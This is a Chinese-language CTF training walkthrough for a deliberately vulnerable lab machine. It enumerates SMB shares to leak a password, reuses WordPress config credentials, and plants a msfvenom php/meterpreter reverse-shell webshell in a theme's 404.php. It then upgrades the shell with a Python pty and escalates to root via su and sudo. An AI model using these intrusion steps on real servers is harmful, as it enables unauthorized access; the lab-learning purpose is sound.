CTF训练 SMB信息泄露(含靶场下载地址)

确认ip，挖掘信息

仍然是首先查看ip，通过sudo -i 获取root，然后用netdiscover找到靶机的地址。



靶机的ip是192.168.43.120
因为虚拟机的网络设置选的是桥接模式，所以后面显示的是vmware, Inc。
挖掘开放信息服务：nmap -sV 192.168.43.17

针对smb协议弱点探测

因为这节主要针对的是smb协议，所以对其进行一波探测
首先，使用空口令：smbclient -L IP，列出该ip所分享的文件和链接。

Print$是共享驱动，就是共享打印机Share$是共享文件夹
IPC$是共享空连接，不需要用户名就能登陆的web服务器

smbclient ‘\IP\print$’ 查看print里面的东西（没有权限）

smbclient’\IP\share$'同理

get+文件名，可以下载获得文件信息

打开新的终端，打开文件：

发现写着密码为12345

相同的方法下载todolist.txt下来看看

接下来打开wordpress看看，主要看配置文件

可以从前面看到该服务器开放了mysql 3306端口，尝试直接连接数据库

失败

因为开放了22端口，尝试使用ssh协议远程登录。

（下面因为更换了网络，导致ip地址出现了变化
从192.168.43.120变成了192.168.3.13。）

针对smb协议，查看是否存在远程溢出漏洞进行分析。
searchsploit samba版本号

没有任何漏洞可以利用

针对http协议弱点探测

使用dirb命令进行扫描

发现wrodpress的wp-admin

打开网页看看

输入前面的wp-config.php中的账号和密码。

成功进入

构造payload获取shell

使用msfvenom构造payload

不用输入lhost 和lport，已经自己构造好了。

新建一个shell.php文件，将payload输入(此处的ip是攻击机的ip)：


使用payload：
打开msfconsole

输入use exploit/multi/handler命令

设置payload
set payload php/meterpreter/reverse_tcp

通过show options查看设置

设置lhost，通过show options查看：

run启动监听

在wordpress中上传webshell

获取反弹shell：wordpress 上传点 theme 404.php
执行：http://靶场IP/wordpress/wp-content/themes/twentyfourteen/404.php

将webshell.php粘贴到 wordpress中的Appearance中，Editor中的404页面

点击update file

接下来访问404页面

执行：http://靶场IP/wordpress/wp-content/themes/twentyfifteen/404.php

注意这里的twentyfifiteen要按照图中自己的实际情况修改，打开网址

查看监听端：

发现确实返回了一个shell，而且是从靶场ip返回的

输入shell，输入id，查看当前用户

到这里便拿到了服务器的普通权限。

优化终端

python -c “import pty;pty.spawn(’/bin/bash’)”

回到了熟悉的界面。

获得flag

使用cat /etc/passwd命令
来查看每个用户账号的属性。

可以看到里面有一个熟悉的，在wordpress页面中出现了很多次的用户togie，切换到其账户:

su togie

密码是之前deets.txt中写的12345

成功进入
同理，使用sudo -i命令进入root模式，密码同样是12345

进入root目录，可以看到proof.txt文件。